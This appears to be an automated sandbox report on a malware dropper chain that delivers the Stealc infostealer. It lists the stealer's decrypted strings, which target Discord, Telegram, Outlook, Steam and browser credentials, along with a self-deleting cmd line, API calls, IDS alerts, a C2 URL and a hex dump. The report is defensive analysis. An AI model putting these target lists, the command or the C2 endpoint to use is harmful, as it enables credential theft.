Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: System Summary:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - HWID:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - OS:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Architecture:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - UserName:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Computer Name:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Local Time:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - UTC:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Language:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Keyboards:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Laptop:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Running Path:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - CPU:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Threads:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Cores:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - RAM:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Display Resolution:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - GPU:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: User Agents:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Installed Apps:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: All Users:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Current User:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Process List:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: system_info.txt
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: freebl3.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: mozglue.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: msvcp140.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: nss3.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: softokn3.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: vcruntime140.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \Temp\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: .exe
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: runas
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: open
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: /c start
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %DESKTOP%
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %APPDATA%
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %USERPROFILE%
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %DOCUMENTS%
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %RECENT%
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: *.lnk
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: files
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \discord\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \Telegram Desktop\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: key_datas
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: map*
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Telegram
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: *.tox
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: *.ini
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Password
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: 00000001
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: 00000002
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: 00000003
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: 00000004
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Pidgin
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \.purple\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: accounts.xml
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: token:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Software\Valve\Steam
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SteamPath
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \config\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ssfn*
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: config.vdf
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: DialogConfig.vdf
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: libraryfolders.vdf
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: loginusers.vdf
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \Steam\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: browsers
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: done
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: soft
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: https
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: POST
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: HTTP/1.1
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: hwid
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: build
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: token
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: file_name
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: file
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: message
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	8_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	8_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	8_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	8_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	8_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C26C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	8_2_68C26C80
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D7A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	8_2_68D7A9A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00CC4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	11_2_00CC4280
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00CC45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	11_2_00CC45A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 11.2.run.exe.426ed5b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.cmd.exe.4fdce64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 72.2.run.exe.336586d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 72.2.run.exe.33a915b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.cmd.exe.4fdc264.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 72.2.run.exe.33a9d5b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.cmd.exe.4f98976.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.run.exe.426e15b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.run.exe.422a86d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 4820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 5664, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\i1.exe	Unpacked PE file: 6.2.i1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Unpacked PE file: 8.2.u2xs.0.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49718 version: TLS 1.0

Source: C:\Users\user\AppData\Local\Temp\i1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.125.202:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 156.146.43.65:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.80.150.121:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.80.150.121:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.193:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.193:443 -> 192.168.2.5:49775 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: u2xs.0.exe, 00000008.00000002.3041646591.0000000068C8D000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 0000000B.00000002.2430367136.0000000068BE7000.00000002.00000001.01000000.0000000E.sdmp, run.exe, 00000048.00000002.2702582902.0000000068697000.00000002.00000001.01000000.0000000E.sdmp, relay.dll.6.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2105621926.00000000030E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\letagahukob\lox.pdb source: i1.exe, 00000006.00000003.2143790101.0000000005D31000.00000004.00000020.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000000.2141333579.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: B C:\cuxi.pdb source: i1.exe, 00000006.00000000.2080168862.0000000000411000.00000002.00000001.01000000.00000007.sdmp, i1.exe, 00000006.00000002.2693736417.00000000040CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2129722133.0000000007516000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.pdb@C source: powershell.exe, 00000007.00000002.2129722133.0000000007516000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\cuxi.pdb source: i1.exe, 00000006.00000000.2080168862.0000000000411000.00000002.00000001.01000000.00000007.sdmp, i1.exe, 00000006.00000002.2693736417.00000000040CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 0000000B.00000002.2396564347.000000000435B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2399636203.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2401218324.0000000004B6F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2646807819.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2650508923.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000048.00000002.2694623651.0000000004370000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693872160.0000000004014000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000048.00000002.2696609926.000000000482A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 0000000B.00000002.2396564347.000000000435B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2399636203.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2401218324.0000000004B6F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2646807819.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2650508923.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000048.00000002.2694623651.0000000004370000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693872160.0000000004014000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000048.00000002.2696609926.000000000482A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ApproveChildRequest.pdb source: i3.exe, 0000000C.00000003.2324373570.00000000005E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: mozglue.pdb source: u2xs.0.exe, 00000008.00000002.3041646591.0000000068C8D000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 0000000B.00000002.2349814954.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 0000000B.00000000.2283984146.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 00000048.00000002.2689699687.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 00000048.00000000.2605971027.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: ApproveChildRequest.pdbGCTL source: i3.exe, 0000000C.00000003.2324373570.00000000005E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbi source: powershell.exe, 00000007.00000002.2105621926.0000000003143000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0041D8B1 FindFirstFileExA,	6_2_0041D8B1
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CADB18 FindFirstFileExA,	6_2_05CADB18
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	8_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	8_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	8_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	8_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	8_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	8_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68AE261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	11_2_68AE261E

Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData\Local\Temp\u2xs.2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.5:49709 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49714 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49714 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.5:49714

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647

Performs DNS queries to domains with low reputation

Source:	DNS query: c.574859385.xyz
Source:	DNS query: service-domain.xyz
Source:	DNS query: api4.check-data.xyz
Source:	DNS query: api.check-data.xyz

Yara detected Generic Downloader

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.5:49755 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 15:10:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 15:00:01 GMTETag: "6e801-61701287ad007"Accept-Ranges: bytesContent-Length: 452609Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 76 3c 9d 55 32 5d f3 06 32 5d f3 06 32 5d f3 06 3f 0f 2c 06 2e 5d f3 06 3f 0f 13 06 4c 5d f3 06 3f 0f 12 06 1c 5d f3 06 3b 25 60 06 31 5d f3 06 32 5d f2 06 5e 5d f3 06 87 c3 16 06 33 5d f3 06 3f 0f 28 06 33 5d f3 06 87 c3 2d 06 33 5d f3 06 52 69 63 68 32 5d f3 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 9c 50 29 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 00 01 00 00 be c4 03 00 00 00 00 47 43 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 c5 03 00 04 00 00 fd 8d 07 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 01 00 28 00 00 00 00 50 c4 03 0d 6d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 c5 03 64 13 00 00 f0 11 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 68 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 